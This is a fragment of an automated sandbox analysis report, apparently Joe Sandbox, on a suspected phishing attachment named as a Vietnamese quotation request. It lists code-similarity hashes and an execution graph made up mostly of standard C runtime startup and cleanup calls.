                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 8$>$H$I
                                                                                                                                                                                                                                                                  • API String ID: 0-738035983
                                                                                                                                                                                                                                                                  • Opcode ID: be96d513a92c329c88a909f5eccc16a527837db90586ad49182c58fc95dc4db9
                                                                                                                                                                                                                                                                  • Instruction ID: 88176e2371c3e08d56943038624cfd44d79ded7a378bfcfe0bcef8bca0ffbaf1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be96d513a92c329c88a909f5eccc16a527837db90586ad49182c58fc95dc4db9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C01B6B4D15309CFDB54CF58C1487AD77FCEB4A398F049595E018AB640C3B88985CF45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: '$+$>$I
                                                                                                                                                                                                                                                                  • API String ID: 0-1108830520
                                                                                                                                                                                                                                                                  • Opcode ID: 007806d1da9f58598934b8bcb25240953e178d63fc1a455e7d5fc7a31bf0690d
                                                                                                                                                                                                                                                                  • Instruction ID: f9705d26662743893511c881ba5dc21da73ea8aaa5b8cc2f5ba0309fe2ca0681
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 007806d1da9f58598934b8bcb25240953e178d63fc1a455e7d5fc7a31bf0690d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9001B6B0C05209CFDB28CF59D1487ADB7FCEB0A398F049495E418AB650C3B88985CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:2.7%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                  Signature Coverage:3.4%
                                                                                                                                                                                                                                                                  Total number of Nodes:1252
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                  execution_graph 4365 10007a80 4366 10007a8d 4365->4366 4367 1000637b _abort 19 API calls 4366->4367 4368 10007aa7 4367->4368 4369 1000571e _free 19 API calls 4368->4369 4370 10007ab3 4369->4370 4371 1000637b _abort 19 API calls 4370->4371 4374 10007ad9 4370->4374 4373 10007acd 4371->4373 4375 1000571e _free 19 API calls 4373->4375 4376 10007ae5 4374->4376 4377 10005eb7 4374->4377 4375->4374 4378 10005c45 _abort 5 API calls 4377->4378 4379 10005ede 4378->4379 4380 10005efc InitializeCriticalSectionAndSpinCount 4379->4380 4381 10005ee7 4379->4381 4380->4381 4382 10002ada _ValidateLocalCookies 4 API calls 4381->4382 4383 10005f13 4382->4383 4383->4374 5015 10008640 5018 10008657 5015->5018 5019 10008665 5018->5019 5020 10008679 5018->5020 5021 10006368 _free 19 API calls 5019->5021 5022 10008681 5020->5022 5023 10008693 5020->5023 5024 1000866a 5021->5024 5025 10006368 _free 19 API calls 5022->5025 5026 100054a7 __fassign 35 API calls 5023->5026 5029 10008652 5023->5029 5027 100062ac _abort 24 API calls 5024->5027 5028 10008686 5025->5028 5026->5029 5027->5029 5030 100062ac _abort 24 API calls 5028->5030 5030->5029 5031 10008cc1 5032 10008cd0 5031->5032 5033 10008d37 5031->5033 5032->5033 5038 10008cfa 5032->5038 5034 10006368 _free 19 API calls 5033->5034 5035 10008d3c 5034->5035 5036 10006355 __dosmaperr 19 API calls 5035->5036 5037 10008d27 5036->5037 5038->5037 5039 10008d21 SetStdHandle 5038->5039 5039->5037 4384 10005303 4387 100050a5 4384->4387 4396 1000502f 4387->4396 4390 1000502f 4 API calls 4391 100050c3 4390->4391 4400 10005000 4391->4400 4394 10005000 19 API calls 4395 100050d9 4394->4395 4397 10005048 4396->4397 4398 10002ada _ValidateLocalCookies 4 API calls 4397->4398 4399 10005069 4398->4399 4399->4390 4404 1000502a 4400->4404 4405 1000500d 4400->4405 4401 10005024 4402 1000571e _free 19 API calls 4401->4402 4402->4404 4403 1000571e _free 19 API calls 4403->4405 4404->4394 4405->4401 4405->4403 4406 10007103 GetCommandLineA GetCommandLineW 5040 10001f45 5041 10001f49 5040->5041 5043 10001f51 5040->5043 5056 1000247c 5041->5056 5044 10002041 5043->5044 5045 10001f7c 5043->5045 5052 10001f57 ___scrt_is_nonwritable_in_current_image 5043->5052 5073 10002639 5044->5073 5065 100023de 5045->5065 5048 10002048 5049 10001f8b __RTC_Initialize 5049->5052 5068 100022fc RtlInitializeSListHead 5049->5068 5051 10001f99 ___scrt_initialize_default_local_stdio_options 5069 100046c5 5051->5069 5054 10001fad 5054->5052 5055 10004669 _abort 4 API calls 5054->5055 5055->5052 5057 10002485 ___isa_available_init 5056->5057 5077 100034ea 5057->5077 5059 10002496 5060 1000249a 5059->5060 5086 100053c8 5059->5086 5060->5043 5063 100024b1 5063->5043 5160 100024b5 5065->5160 5067 100023e5 5067->5049 5068->5051 5070 100046dc 5069->5070 5071 10002ada _ValidateLocalCookies 4 API calls 5070->5071 5072 10004706 5071->5072 5072->5054 5074 1000264a ___scrt_fastfail 5073->5074 5075 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5074->5075 5076 10002744 ___scrt_fastfail 5075->5076 5076->5048 5078 100034ef ___vcrt_initialize_winapi_thunks 5077->5078 5097 10003936 5078->5097 5081 100034fd 5081->5059 5083 10003505 5084 10003510 5083->5084 5111 10003972 5083->5111 5084->5059 5152 10007457 5086->5152 5089 10003529 5090 10003532 5089->5090 5091 10003543 5089->5091 5092 1000391b ___vcrt_uninitialize_ptd 6 API calls 5090->5092 5091->5060 5093 10003537 5092->5093 5094 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 5093->5094 5095 1000353c 5094->5095 5156 10003c50 5095->5156 5098 1000393f 5097->5098 5100 10003968 5098->5100 5102 100034f9 5098->5102 5115 10003be0 5098->5115 5101 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 5100->5101 5101->5102 5102->5081 5103 100038e8 5102->5103 5133 10003af1 5103->5133 5106 100038fd 5106->5083 5109 10003918 5109->5083 5112 1000399c 5111->5112 5113 1000397d 5111->5113 5112->5081 5114 10003987 RtlDeleteCriticalSection 5113->5114 5114->5112 5114->5114 5120 10003a82 5115->5120 5117 10003bfa 5118 10003c18 InitializeCriticalSectionAndSpinCount 5117->5118 5119 10003c03 5117->5119 5118->5119 5119->5098 5121 10003aa6 __crt_fast_encode_pointer 5120->5121 5122 10003aaa 5120->5122 5121->5117 5122->5121 5126 100039be 5122->5126 5125 10003ac4 GetProcAddress 5125->5121 5131 100039cd try_get_first_available_module 5126->5131 5127 100039ea LoadLibraryExW 5128 10003a05 GetLastError 5127->5128 5127->5131 5128->5131 5129 10003a60 FreeLibrary 5129->5131 5130 10003a77 5130->5121 5130->5125 5131->5127 5131->5129 5131->5130 5132 10003a38 LoadLibraryExW 5131->5132 5132->5131 5134 10003a82 try_get_function 5 API calls 5133->5134 5135 10003b0b 5134->5135 5136 10003b24 TlsAlloc 5135->5136 5137 100038f2 5135->5137 5137->5106 5138 10003ba2 5137->5138 5139 10003a82 try_get_function 5 API calls 5138->5139 5140 10003bbc 5139->5140 5141 10003bd7 TlsSetValue 5140->5141 5142 1000390b 5140->5142 5141->5142 5142->5109 5143 1000391b 5142->5143 5144 1000392b 5143->5144 5145 10003925 5143->5145 5144->5106 5147 10003b2c 5145->5147 5148 10003a82 try_get_function 5 API calls 5147->5148 5149 10003b46 5148->5149 5150 10003b5e TlsFree 5149->5150 5151 10003b52 5149->5151 5150->5151 5151->5144 5155 10007470 5152->5155 5153 10002ada _ValidateLocalCookies 4 API calls 5154 100024a3 5153->5154 5154->5063 5154->5089 5155->5153 5157 10003c59 5156->5157 5159 10003c7f 5156->5159 5158 10003c69 FreeLibrary 5157->5158 5157->5159 5158->5157 5159->5091 5161 100024c4 5160->5161 5162 100024c8 5160->5162 5161->5067 5163 10002639 ___scrt_fastfail 3 API calls 5162->5163 5165 100024d5 ___scrt_release_startup_lock 5162->5165 5164 10002559 5163->5164 5165->5067 5166 10007bc7 5167 10007bd3 ___DestructExceptionObject 5166->5167 5170 10007c0a _abort 5167->5170 5174 10005671 RtlEnterCriticalSection 5167->5174 5169 10007be7 5171 10007f86 __fassign 19 API calls 5169->5171 5172 10007bf7 5171->5172 5175 10007c10 5172->5175 5174->5169 5178 100056b9 RtlLeaveCriticalSection 5175->5178 5177 10007c17 5177->5170 5178->5177 5179 10005348 5180 10003529 ___vcrt_uninitialize 8 API calls 5179->5180 5181 1000534f 5180->5181 5182 10007b48 5189 10008ebf 5182->5189 5184 10007b50 5185 10007b64 RtlDeleteCriticalSection 5184->5185 5185->5184 5186 10007b7f 5185->5186 5187 1000571e _free 19 API calls 5186->5187 5188 10007b8a 5187->5188 5192 10008ec8 5189->5192 5191 10008ec6 5191->5184 5193 10008ed4 ___DestructExceptionObject 5192->5193 5202 10005671 RtlEnterCriticalSection 5193->5202 5195 10008f77 5207 10008f97 5195->5207 5199 10008f83 _abort 5199->5191 5200 10008e78 26 API calls 5201 10008ee3 5200->5201 5201->5195 5201->5200 5203 10007b94 RtlEnterCriticalSection 5201->5203 5204 10008f6d 5201->5204 5202->5201 5203->5201 5210 10007ba8 RtlLeaveCriticalSection 5204->5210 5206 10008f75 5206->5201 5211 100056b9 RtlLeaveCriticalSection 5207->5211 5209 10008f9e 5209->5199 5210->5206 5211->5209 4407 10008a89 4410 10006d60 4407->4410 4411 10006d69 4410->4411 4412 10006d72 4410->4412 4414 10006c5f 4411->4414 4434 10005af6 GetLastError 4414->4434 4416 10006c6c 4454 10006d7e 4416->4454 4418 10006c74 4463 100069f3 4418->4463 4421 10006c8b 4421->4412 4426 1000571e _free 19 API calls 4426->4421 4427 10006cc9 4428 10006368 _free 19 API calls 4427->4428 4430 10006cce 4428->4430 4429 10006d12 4429->4430 4487 100068c9 4429->4487 4430->4426 4431 10006ce6 4431->4429 4432 1000571e _free 19 API calls 4431->4432 4432->4429 4435 10005b0c 4434->4435 4438 10005b12 4434->4438 4436 10005e08 _abort 10 API calls 4435->4436 4436->4438 4437 1000637b _abort 19 API calls 4439 10005b24 4437->4439 4438->4437 4440 10005b61 SetLastError 4438->4440 4441 10005b2c 4439->4441 4442 10005e5e _abort 10 API calls 4439->4442 4440->4416 4444 1000571e _free 19 API calls 4441->4444 4443 10005b41 4442->4443 4443->4441 4445 10005b48 4443->4445 4446 10005b32 4444->4446 4447 1000593c _abort 19 API calls 4445->4447 4448 10005b6d SetLastError 4446->4448 4449 10005b53 4447->4449 4490 100055a8 4448->4490 4451 1000571e _free 19 API calls 4449->4451 4453 10005b5a 4451->4453 4453->4440 4453->4448 4455 10006d8a ___DestructExceptionObject 4454->4455 4456 10005af6 _abort 35 API calls 4455->4456 4461 10006d94 4456->4461 4458 10006e18 _abort 4458->4418 4460 100055a8 _abort 35 API calls 4460->4461 4461->4458 4461->4460 4462 1000571e _free 19 API calls 4461->4462 4653 10005671 RtlEnterCriticalSection 4461->4653 4654 10006e0f 4461->4654 4462->4461 4658 100054a7 4463->4658 4466 10006a14 GetOEMCP 4469 10006a3d 4466->4469 4467 10006a26 4468 10006a2b GetACP 4467->4468 4467->4469 4468->4469 4469->4421 4470 100056d0 4469->4470 4471 1000570e 4470->4471 4475 100056de _abort 4470->4475 4473 10006368 _free 19 API calls 4471->4473 4472 100056f9 RtlAllocateHeap 4474 1000570c 4472->4474 4472->4475 4473->4474 4474->4430 4477 10006e20 4474->4477 4475->4471 4475->4472 4476 1000474f _abort 6 API calls 4475->4476 4476->4475 4478 100069f3 37 API calls 4477->4478 4479 10006e3f 4478->4479 4482 10006e90 IsValidCodePage 4479->4482 4484 10006e46 4479->4484 4486 10006eb5 ___scrt_fastfail 4479->4486 4480 10002ada _ValidateLocalCookies 4 API calls 4481 10006cc1 4480->4481 4481->4427 4481->4431 4483 10006ea2 GetCPInfo 4482->4483 4482->4484 4483->4484 4483->4486 4484->4480 4723 10006acb GetCPInfo 4486->4723 4796 10006886 4487->4796 4489 100068ed 4489->4430 4499 10007613 4490->4499 4495 100055b8 4498 100055e0 4495->4498 4527 100060e2 4495->4527 4533 10004bc1 4498->4533 4536 10007581 4499->4536 4502 1000766e 4503 1000767a 4502->4503 4504 10005b7a _abort 19 API calls 4503->4504 4505 100076a1 _abort 4503->4505 4509 100076a7 _abort 4503->4509 4504->4505 4506 100076f3 4505->4506 4505->4509 4526 100076d6 4505->4526 4507 10006368 _free 19 API calls 4506->4507 4508 100076f8 4507->4508 4550 100062ac 4508->4550 4512 1000771f 4509->4512 4553 10005671 RtlEnterCriticalSection 4509->4553 4513 1000777e 4512->4513 4515 10007776 4512->4515 4523 100077a9 4512->4523 4554 100056b9 RtlLeaveCriticalSection 4512->4554 4513->4523 4555 10007665 4513->4555 4518 10004bc1 _abort 27 API calls 4515->4518 4518->4513 4520 10005af6 _abort 35 API calls 4524 1000780c 4520->4524 4522 10007665 _abort 35 API calls 4522->4523 4558 1000782e 4523->4558 4525 10005af6 _abort 35 API calls 4524->4525 4524->4526 4525->4526 4526->4495 4528 100060fe ___scrt_fastfail 4527->4528 4529 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4528->4529 4532 100061fb ___scrt_fastfail 4529->4532 4530 10002ada _ValidateLocalCookies 4 API calls 4531 10006219 4530->4531 4531->4498 4532->4530 4578 1000499b 4533->4578 4539 10007527 4536->4539 4538 100055ad 4538->4495 4538->4502 4540 10007533 ___DestructExceptionObject 4539->4540 4545 10005671 RtlEnterCriticalSection 4540->4545 4542 10007541 4546 10007575 4542->4546 4544 10007568 _abort 4544->4538 4545->4542 4549 100056b9 RtlLeaveCriticalSection 4546->4549 4548 1000757f 4548->4544 4549->4548 4562 10006231 4550->4562 4552 100062b8 4552->4526 4553->4512 4554->4515 4556 10005af6 _abort 35 API calls 4555->4556 4557 1000766a 4556->4557 4557->4522 4559 10007834 4558->4559 4560 100077fd 4558->4560 4577 100056b9 RtlLeaveCriticalSection 4559->4577 4560->4520 4560->4524 4560->4526 4563 10005b7a _abort 19 API calls 4562->4563 4564 10006247 4563->4564 4565 100062a6 4564->4565 4567 10006255 4564->4567 4573 100062bc 4565->4573 4570 10002ada _ValidateLocalCookies 4 API calls 4567->4570 4568 100062ab 4569 10006231 _abort 24 API calls 4568->4569 4571 100062b8 4569->4571 4572 1000627c 4570->4572 4571->4552 4572->4552 4574 100062c3 4573->4574 4575 100060e2 _abort 7 API calls 4574->4575 4576 100062dc GetCurrentProcess TerminateProcess 4575->4576 4576->4568 4577->4560 4579 100049a7 4578->4579 4587 100049bf 4579->4587 4597 10004af5 GetModuleHandleW 4579->4597 4585 100049c7 4586 10004a3c 4585->4586 4595 10004a65 4585->4595 4607 1000527a 4585->4607 4588 10004a54 4586->4588 4610 10004669 4586->4610 4606 10005671 RtlEnterCriticalSection 4587->4606 4592 10004669 _abort 4 API calls 4588->4592 4590 10004aae 4592->4595 4614 10004aa5 4595->4614 4598 100049b3 4597->4598 4598->4587 4599 10004b39 GetModuleHandleExW 4598->4599 4600 10004b63 GetProcAddress 4599->4600 4601 10004b78 4599->4601 4600->4601 4602 10004b95 4601->4602 4603 10004b8c FreeLibrary 4601->4603 4604 10002ada _ValidateLocalCookies 4 API calls 4602->4604 4603->4602 4605 10004b9f 4604->4605 4605->4587 4606->4585 4625 10005132 4607->4625 4611 10004698 4610->4611 4612 10002ada _ValidateLocalCookies 4 API calls 4611->4612 4613 100046c1 4612->4613 4613->4588 4646 100056b9 RtlLeaveCriticalSection 4614->4646 4616 10004a7e 4616->4590 4617 10004ab4 4616->4617 4647 10006025 4617->4647 4620 10004ae2 4622 10004b39 _abort 7 API calls 4620->4622 4621 10004ac2 GetPEB 4621->4620 4623 10004ad2 GetCurrentProcess TerminateProcess 4621->4623 4624 10004aea ExitProcess 4622->4624 4623->4620 4628 100050e1 4625->4628 4627 10005156 4627->4586 4629 100050ed ___DestructExceptionObject 4628->4629 4636 10005671 RtlEnterCriticalSection 4629->4636 4631 100050fb 4637 1000515a 4631->4637 4635 10005119 _abort 4635->4627 4636->4631 4640 1000517a 4637->4640 4641 10005182 4637->4641 4638 10002ada _ValidateLocalCookies SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 4639 10005108 4638->4639 4643 10005126 4639->4643 4640->4638 4641->4640 4642 1000571e _free 19 API calls 4641->4642 4642->4640 4644 100056b9 _abort RtlLeaveCriticalSection 4643->4644 4645 10005130 4644->4645 4645->4635 4646->4616 4648 1000604a 4647->4648 4652 10006040 4647->4652 4649 10005c45 _abort 5 API calls 4648->4649 4649->4652 4650 10002ada _ValidateLocalCookies 4 API calls 4651 10004abe 4650->4651 4651->4620 4651->4621 4652->4650 4653->4461 4657 100056b9 RtlLeaveCriticalSection 4654->4657 4656 10006e16 4656->4461 4657->4656 4659 100054c4 4658->4659 4660 100054ba 4658->4660 4659->4660 4661 10005af6 _abort 35 API calls 4659->4661 4660->4466 4660->4467 4662 100054e5 4661->4662 4666 10007a00 4662->4666 4667 10007a13 4666->4667 4668 100054fe 4666->4668 4667->4668 4674 10007f0f 4667->4674 4670 10007a2d 4668->4670 4671 10007a40 4670->4671 4673 10007a55 4670->4673 4672 10006d7e __fassign 35 API calls 4671->4672 4671->4673 4672->4673 4673->4660 4675 10007f1b ___DestructExceptionObject 4674->4675 4676 10005af6 _abort 35 API calls 4675->4676 4677 10007f24 4676->4677 4678 10007f72 _abort 4677->4678 4686 10005671 RtlEnterCriticalSection 4677->4686 4678->4668 4680 10007f42 4687 10007f86 4680->4687 4685 100055a8 _abort 35 API calls 4685->4678 4686->4680 4688 10007f56 4687->4688 4689 10007f94 __fassign 4687->4689 4691 10007f75 4688->4691 4689->4688 4694 10007cc2 4689->4694 4722 100056b9 RtlLeaveCriticalSection 4691->4722 4693 10007f69 4693->4678 4693->4685 4696 10007d42 4694->4696 4703 10007cd8 4694->4703 4695 10007d90 4718 10007e35 4695->4718 4696->4695 4698 1000571e _free 19 API calls 4696->4698 4699 10007d64 4698->4699 4701 1000571e _free 19 API calls 4699->4701 4700 10007d00 4702 10007d22 4700->4702 4708 1000571e _free 19 API calls 4700->4708 4704 10007d77 4701->4704 4705 1000571e _free 19 API calls 4702->4705 4703->4696 4703->4700 4706 1000571e _free 19 API calls 4703->4706 4707 1000571e _free 19 API calls 4704->4707 4709 10007d37 4705->4709 4706->4700 4713 10007d85 4707->4713 4708->4702 4714 1000571e _free 19 API calls 4709->4714 4710 10007dfe 4715 1000571e _free 19 API calls 4710->4715 4711 10007d9e 4711->4710 4712 1000571e 19 API calls _free 4711->4712 4712->4711 4716 1000571e _free 19 API calls 4713->4716 4714->4696 4717 10007e04 4715->4717 4716->4695 4717->4688 4719 10007e42 4718->4719 4721 10007e60 4718->4721 4720 1000571e _free 19 API calls 4719->4720 4719->4721 4720->4721 4721->4711 4722->4693 4724 10006baf 4723->4724 4728 10006b05 4723->4728 4727 10002ada _ValidateLocalCookies 4 API calls 4724->4727 4730 10006c5b 4727->4730 4733 100086e4 4728->4733 4730->4484 4732 10008a3e 40 API calls 4732->4724 4734 100054a7 __fassign 35 API calls 4733->4734 4735 10008704 MultiByteToWideChar 4734->4735 4737 10008742 4735->4737 4745 100087da 4735->4745 4740 100056d0 20 API calls 4737->4740 4742 10008763 ___scrt_fastfail 4737->4742 4738 10002ada _ValidateLocalCookies 4 API calls 4741 10006b66 4738->4741 4739 100087d4 4752 10008801 4739->4752 4740->4742 4747 10008a3e 4741->4747 4742->4739 4744 100087a8 MultiByteToWideChar 4742->4744 4744->4739 4746 100087c4 GetStringTypeW 4744->4746 4745->4738 4746->4739 4748 100054a7 __fassign 35 API calls 4747->4748 4749 10008a51 4748->4749 4756 10008821 4749->4756 4753 1000880d 4752->4753 4755 1000881e 4752->4755 4754 1000571e _free 19 API calls 4753->4754 4753->4755 4754->4755 4755->4745 4757 1000883c MultiByteToWideChar 4756->4757 4759 10008a16 4757->4759 4760 1000888c 4757->4760 4761 10002ada _ValidateLocalCookies 4 API calls 4759->4761 4763 100056d0 20 API calls 4760->4763 4768 100088ad 4760->4768 4762 10006b87 4761->4762 4762->4732 4763->4768 4764 100088f6 MultiByteToWideChar 4765 1000890f 4764->4765 4778 10008962 4764->4778 4783 10005f19 4765->4783 4767 10008801 __freea 19 API calls 4767->4759 4768->4764 4768->4778 4770 10008971 4772 100056d0 20 API calls 4770->4772 4779 10008992 4770->4779 4771 10008939 4774 10005f19 10 API calls 4771->4774 4771->4778 4772->4779 4773 10008a07 4775 10008801 __freea 19 API calls 4773->4775 4774->4778 4775->4778 4776 10005f19 10 API calls 4777 100089e6 4776->4777 4777->4773 4780 100089f5 WideCharToMultiByte 4777->4780 4778->4767 4779->4773 4779->4776 4780->4773 4781 10008a35 4780->4781 4782 10008801 __freea 19 API calls 4781->4782 4782->4778 4784 10005c45 _abort 5 API calls 4783->4784 4785 10005f40 4784->4785 4788 10005f49 4785->4788 4791 10005fa1 4785->4791 4789 10002ada _ValidateLocalCookies 4 API calls 4788->4789 4790 10005f9b 4789->4790 4790->4770 4790->4771 4790->4778 4792 10005c45 _abort 5 API calls 4791->4792 4793 10005fc8 4792->4793 4794 10002ada _ValidateLocalCookies 4 API calls 4793->4794 4795 10005f89 LCMapStringW 4794->4795 4795->4788 4797 10006892 ___DestructExceptionObject 4796->4797 4804 10005671 RtlEnterCriticalSection 4797->4804 4799 1000689c 4805 100068f1 4799->4805 4803 100068b5 _abort 4803->4489 4804->4799 4817 10007011 4805->4817 4807 1000693f 4808 10007011 24 API calls 4807->4808 4809 1000695b 4808->4809 4810 10007011 24 API calls 4809->4810 4811 10006979 4810->4811 4812 100068a9 4811->4812 4813 1000571e _free 19 API calls 4811->4813 4814 100068bd 4812->4814 4813->4812 4831 100056b9 RtlLeaveCriticalSection 4814->4831 4816 100068c7 4816->4803 4818 10007022 4817->4818 4826 1000701e 4817->4826 4819 10007029 4818->4819 4822 1000703c ___scrt_fastfail 4818->4822 4820 10006368 _free 19 API calls 4819->4820 4821 1000702e 4820->4821 4823 100062ac _abort 24 API calls 4821->4823 4824 10007073 4822->4824 4825 1000706a 4822->4825 4822->4826 4823->4826 4824->4826 4829 10006368 _free 19 API calls 4824->4829 4827 10006368 _free 19 API calls 4825->4827 4826->4807 4828 1000706f 4827->4828 4830 100062ac _abort 24 API calls 4828->4830 4829->4828 4830->4826 4831->4816 5212 10002049 5213 10002055 ___DestructExceptionObject 5212->5213 5214 100020d3 5213->5214 5215 1000207d 5213->5215 5225 1000205e 5213->5225 5216 10002639 ___scrt_fastfail 3 API calls 5214->5216 5226 1000244c 5215->5226 5218 100020da 5216->5218 5219 10002082 5235 10002308 5219->5235 5221 10002087 __RTC_Initialize 5238 100020c4 5221->5238 5223 1000209f 5241 1000260b 5223->5241 5227 10002451 ___scrt_release_startup_lock 5226->5227 5228 10002455 5227->5228 5231 10002461 5227->5231 5229 1000527a _abort 19 API calls 5228->5229 5230 1000245f 5229->5230 5230->5219 5232 1000246e 5231->5232 5233 1000499b _abort 27 API calls 5231->5233 5232->5219 5234 10004bbd 5233->5234 5234->5219 5247 100034c7 RtlInterlockedFlushSList 5235->5247 5237 10002312 5237->5221 5249 1000246f 5238->5249 5240 100020c9 ___scrt_release_startup_lock 5240->5223 5242 10002617 5241->5242 5243 1000262d 5242->5243 5268 100053ed 5242->5268 5243->5225 5246 10003529 ___vcrt_uninitialize 8 API calls 5246->5243 5248 100034d7 5247->5248 5248->5237 5254 100053ff 5249->5254 5252 1000391b ___vcrt_uninitialize_ptd 6 API calls 5253 1000354d 5252->5253 5253->5240 5257 10005c2b 5254->5257 5258 10002476 5257->5258 5259 10005c35 5257->5259 5258->5252 5261 10005db2 5259->5261 5262 10005c45 _abort 5 API calls 5261->5262 5263 10005dd9 5262->5263 5264 10005df1 TlsFree 5263->5264 5265 10005de5 5263->5265 5264->5265 5266 10002ada _ValidateLocalCookies 4 API calls 5265->5266 5267 10005e02 5266->5267 5267->5258 5271 100074da 5268->5271 5274 100074f3 5271->5274 5272 10002ada _ValidateLocalCookies 4 API calls 5273 10002625 5272->5273 5273->5246 5274->5272 4836 1000220c 4837 10002215 4836->4837 4838 1000221a dllmain_dispatch 4836->4838 4840 100022b1 4837->4840 4841 100022c7 4840->4841 4843 100022d0 4841->4843 4844 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 4841->4844 4843->4838 4844->4843 5275 1000724e GetProcessHeap 5276 1000284f 5277 10002882 std::exception::exception 25 API calls 5276->5277 5278 1000285d 5277->5278 4845 10003c90 RtlUnwind 5279 100036d0 5280 100036e2 5279->5280 5282 100036f0 @_EH4_CallFilterFunc@8 5279->5282 5281 10002ada _ValidateLocalCookies 4 API calls 5280->5281 5281->5282 5283 10005351 5284 10005374 5283->5284 5285 10005360 5283->5285 5286 1000571e _free 19 API calls 5284->5286 5285->5284 5288 1000571e _free 19 API calls 5285->5288 5287 10005386 5286->5287 5289 1000571e _free 19 API calls 5287->5289 5288->5284 5290 10005399 5289->5290 5291 1000571e _free 19 API calls 5290->5291 5292 100053aa 5291->5292 5293 1000571e _free 19 API calls 5292->5293 5294 100053bb 5293->5294 5295 10008d52 5296 10008d5f 5295->5296 5298 10008d74 5295->5298 5297 10006355 __dosmaperr 19 API calls 5296->5297 5300 10008d64 5297->5300 5299 10006355 __dosmaperr 19 API calls 5298->5299 5301 10008d99 5298->5301 5302 10008da4 5299->5302 5303 10006368 _free 19 API calls 5300->5303 5304 10006368 _free 19 API calls 5302->5304 5305 10008d6c 5303->5305 5306 10008dac 5304->5306 5307 100062ac _abort 24 API calls 5306->5307 5307->5305 5308 100073d5 5309 100073e1 ___DestructExceptionObject 5308->5309 5320 10005671 RtlEnterCriticalSection 5309->5320 5311 100073e8 5321 10008be3 5311->5321 5313 100073f7 5314 10007406 5313->5314 5334 10007269 GetStartupInfoW 5313->5334 5345 10007422 5314->5345 5318 10007417 _abort 5320->5311 5322 10008bef ___DestructExceptionObject 5321->5322 5323 10008c13 5322->5323 5324 10008bfc 5322->5324 5348 10005671 RtlEnterCriticalSection 5323->5348 5326 10006368 _free 19 API calls 5324->5326 5327 10008c01 5326->5327 5329 100062ac _abort 24 API calls 5327->5329 5328 10008c1f 5333 10008c4b 5328->5333 5349 10008b34 5328->5349 5331 10008c0b _abort 5329->5331 5331->5313 5356 10008c72 5333->5356 5335 10007286 5334->5335 5336 10007318 5334->5336 5335->5336 5337 10008be3 25 API calls 5335->5337 5340 1000731f 5336->5340 5339 100072af 5337->5339 5338 100072dd GetFileType 5338->5339 5339->5336 5339->5338 5342 10007326 5340->5342 5341 10007369 GetStdHandle 5341->5342 5342->5341 5343 100073d1 5342->5343 5344 1000737c GetFileType 5342->5344 5343->5314 5344->5342 5360 100056b9 RtlLeaveCriticalSection 5345->5360 5347 10007429 5347->5318 5348->5328 5350 1000637b _abort 19 API calls 5349->5350 5351 10008b46 5350->5351 5353 10005eb7 10 API calls 5351->5353 5355 10008b53 5351->5355 5352 1000571e _free 19 API calls 5354 10008ba5 5352->5354 5353->5351 5354->5328 5355->5352 5359 100056b9 RtlLeaveCriticalSection 5356->5359 5358 10008c79 5358->5331 5359->5358 5360->5347 5361 10004ed7 5362 10006d60 48 API calls 5361->5362 5363 10004ee9 5362->5363 5372 10007153 GetEnvironmentStringsW 5363->5372 5366 10004ef4 5368 1000571e _free 19 API calls 5366->5368 5369 10004f29 5368->5369 5370 10004eff 5371 1000571e _free 19 API calls 5370->5371 5371->5366 5373 1000716a 5372->5373 5374 100071bd 5372->5374 5377 10007170 WideCharToMultiByte 5373->5377 5375 100071c6 FreeEnvironmentStringsW 5374->5375 5376 10004eee 5374->5376 5375->5376 5376->5366 5384 10004f2f 5376->5384 5377->5374 5378 1000718c 5377->5378 5379 100056d0 20 API calls 5378->5379 5380 10007192 5379->5380 5381 100071af 5380->5381 5382 10007199 WideCharToMultiByte 5380->5382 5383 1000571e _free 19 API calls 5381->5383 5382->5381 5383->5374 5385 10004f44 5384->5385 5386 1000637b _abort 19 API calls 5385->5386 5387 10004f6b 5386->5387 5390 1000637b _abort 19 API calls 5387->5390 5391 10004fd1 5387->5391 5393 1000544d ___std_exception_copy 24 API calls 5387->5393 5396 10004ff3 5387->5396 5397 10004fcf 5387->5397 5399 1000571e _free 19 API calls 5387->5399 5388 1000571e _free 19 API calls 5389 10004fe9 5388->5389 5389->5370 5390->5387 5392 10005000 19 API calls 5391->5392 5394 10004fd7 5392->5394 5393->5387 5395 1000571e _free 19 API calls 5394->5395 5395->5397 5398 100062bc _abort 9 API calls 5396->5398 5397->5388 5400 10004fff 5398->5400 5399->5387 4846 10002418 4847 10002420 ___scrt_release_startup_lock 4846->4847 4850 100047f5 4847->4850 4849 10002448 4851 10004804 4850->4851 4852 10004808 4850->4852 